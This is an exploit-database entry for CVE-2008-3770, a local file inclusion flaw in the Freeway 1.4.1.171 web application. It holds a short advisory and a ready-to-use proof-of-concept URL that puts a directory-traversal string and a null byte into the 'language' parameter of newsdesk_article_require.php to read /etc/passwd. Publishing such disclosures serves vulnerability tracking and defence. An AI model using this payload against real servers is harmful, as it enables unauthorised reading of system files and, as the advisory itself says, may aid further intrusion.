Freeway 1.4.1.171 includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion

2008-08-18T00:00:00
ID EDB-ID:32266
Type exploitdb
Reporter Digital Security Research Group
Modified 2008-08-18T00:00:00

Description

Freeway 1.4.1.171 includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion. CVE-2008-3770. Webapps exploit fo...

                                        
                                            source: http://www.securityfocus.com/bid/30731/info
    
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
    
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
    
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.

http://www.example.com/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00